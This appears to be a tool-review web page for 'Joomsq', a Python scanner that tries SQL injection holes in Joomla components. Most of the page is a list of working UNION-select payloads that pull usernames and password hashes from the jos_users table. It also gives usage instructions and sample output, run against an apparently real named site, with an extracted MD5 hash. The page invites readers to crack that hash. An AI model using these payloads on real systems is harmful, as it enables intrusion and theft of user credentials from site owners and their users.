The Web Local
 

 

 

Joomsq.pl

 

Joomla Sql Injection Scanner is an exceedingly quick python based vulnerability scanner that can be utilised against Joomla servers.  It is regularly updated by the author with the current exploitable holes (sql injection) that affect Joomla and is also extremely easy to use.   Successful use of the tool will almost certainly provide you with a nice MD5 hash for the website to put into/ submit to your favourite MD5 cracker.

 

It is available from here.

 

At the time of writing it checks for 67 distinct vulnerabilities, a sample of which are:

 


index.php?option=com_quiz&task=user_tst_shw&Itemid=61&tid=1/**/union/**/select/**/0,concat(username,0x3a,password),concat

(username,0x3a,password)/**/from/**/jos_users/*,
index.php?option=com_noticias&Itemid=xcorpitx&task=detalhe&id=-99887766/**/union/**/%20select/**/0,concat(username,0x3a,password,0x3a,email)

,2,3,4,5/**/%20from/**/%20jos_users/*,
index.php?option=com_doc&task=view&sid=-1/**/union/**/select/**/concat(username,0x3a,password),1,2,concat(username,0x3a,password)

,0x3a,5,6,7,8,password,username,11/**/from/**/jos_users/,
index.php?option=com_neoreferences&Itemid=27&catid=99887766/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*%

20where%20user_id=1=1/*,
index.php?option=com_puarcade&Itemid=92&fid=-1%20union%20select%20concat(username,0x3a,password)%20from%20jos_users--,
index.php?option=com_idvnews&id=-1/**/union/**/select/**/0,concat(username,0x3a,password),2222,concat(username,0x3a,password)

,0,0,0,0/**/from/**/jos_users/*,
index.php?option=com_joomlavvz&Itemid=34&func=detail&id=-

9999999+union/**/select+0x3a,0x3a,password,0,0,0,0,0,0,0,0,0x3a,0x3a,0x3a,0x3a,username/**/from/**/jos_users/*,
index.php?option=com_referenzen&Itemid=7&detail=-9999999+union/**/select/**/0x3a,concat(username,0x3a,password)

,0x3a,0x3a,0x3a,0x3a,0x3a,0x3a,concat(username,0x3a,password),0,0,0,0,0/**/from/**/jos_users/*,
index.php?option=com_genealogy&task=profile&id=-9999999/**/union/**/select/**/0,0x3a,2,0x3a,0x3a,5,0x3a,0x3a,8,concat(username,0x3a,password)

/**/from/**/jos_users/*,
index.php?option=com_listoffreeads&AdId=-1/**/union/**/select/**/0,concat(username,0x3a,password)/**/from/**/jos_users/*,
index.php?option=com_facileforms&Itemid=640&user_id=107&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)

/**/from/**/jos_users/*,
index.php?option=com_geoboerse&page=view&catid=-1/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*,
index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%

200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1,1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/jos_users/*,
index.php?option=com_team&gid=-1/**/union/**/select/**/1,2,3,password,5,6,7,8,9,10,username,12,13/**/from/**/jos_users/*,
index.php?option=com_formtool&task=view&formid=2&catid=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*,
 

Installation:

 

Download the file

Python needs to be installed.

 

Execution:

 

Usage: ./joomsq.py <joomla site>
 

Example Output:

 

C:\Python25>joomsq.py www.mgn-games.org

Joomla Sql Injection Scanner v 1.0

beenudel1986[at]gmail[dot]com
[+] JoomlaPath: www.mgn-games.org
[+] Vuln. Loaded: 67
[+] Testing...

Host: http://www.mgn-games.org/index.php?option=com_pcchess&Itemid=61&page=playe
rs&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from
/**/jos_users/*
Found:
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55
- 5e48e4c3a47af5dbfb0a0edcc0fbca55

[-] Done

 

IT Security News:

 

Pen Testing Framework:

 

Latest Tool Reviews: